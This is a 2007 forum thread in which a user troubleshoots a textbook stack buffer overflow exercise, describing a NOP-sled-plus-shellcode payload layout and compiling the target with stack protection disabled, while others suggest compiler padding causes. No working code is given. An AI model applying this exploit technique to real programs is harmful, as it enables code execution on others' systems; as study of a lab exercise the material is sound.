Author | Post | |
unknown user |
i try to exploit the first buffer overflow vulnerable code with an exploit i wrote and its similar with the aleph one exploit. i filled the buffer with the return address of my shellcode and then i put (buffer size)/2 NOP and the shellcode at the beggining of the buffer. although the buffer is 256 bytes long i get a segmentation fault only when i run my exploit with a 500+ bytes buffer. could the program think that the buffer ends when it reads one time the return address i fill the buffer with or the problem is something else? (if i didn type correctly my question feel free to ask me for further information, and btw sorry for any sloppy english ) |
|
17.07.2007 01:50:11 |
|
|
Degenerate |
Just to clarify: are you bruteforcing the amount of bytes you need to fill before reaching the return-address or have you found the address and have a piece of tailored code that should cause a BOF. Either way my experience with this is pretty limited, but that is something I couldnt work out from your post. Degen |
|
17.07.2007 08:52:46 |
|
|
unknown user |
the compier gets to choose how much space it takes for every buffer, it usually takes into account - aligning issues - off by one errors are common, and thus usually it reseves at least a few bytes extra |
|
17.07.2007 09:54:31 |
|
|
unknown user |
the buffer i use looks like this: [NOP][NOP[NOP][NOP][NOP]...[SHELLCODE]....[ADDR][ADDR][ADDR]... ----------buffer size/2------------- where ADDR is the addrese with which i want to overflow the return address. when i compiled the vulnerable program i used the -mpreferred-stack-boundary=2 which set up the stack in double word increments and the -fno-stack-protector to remove the protection linux have for the stack. the problem is that only when i make this buffer almost double the size of the buffer i want to overflow it causes a segfault. so i suspected that when it reaches the first ADDR after the shellcode it suppose that the string ends, so actually my buffers size reduces to 1/2 with only one ADDR at the end of it. could this be the problem? |
|
17.07.2007 10:31:36 |
|
|
unknown user |
try compiling with -O3 or -Os the optimizer will probably shrink the space used. |
|
17.07.2007 11:04:26 |
|
|
Degenerate |
I get the impression you know more than me, although I think your post above gives some useful info for those who know more to help you =] I'll leave you too it and good luck! |
|
17.07.2007 11:23:25 |
|
|
unknown user |
Quote from rhican: try compiling with -O3 or -Os the optimizer will probably shrink the space used. i tried that but i get the same results.... actually i dont think that the problem is with the flags i use when compiling the program than that the program doesn't read all the addresses beyond the shellcode until it reaches the NULL character at the end of the buffer. it just reads the first of them and then stops. so the buffer length that is stored in to the buffer is equal to buffer size/2 that are the NOP + the shellcodes length + 4 bytes of the first address after the shellcode. thats why i get a segfault only when i make a buffer that is almost twice the size of the buffer of the vulnerable program but i am not very sure that this is the case and if it is then it is very difficult to actually make the overflow...any suggestions appreciated |
|
17.07.2007 11:48:55 |
|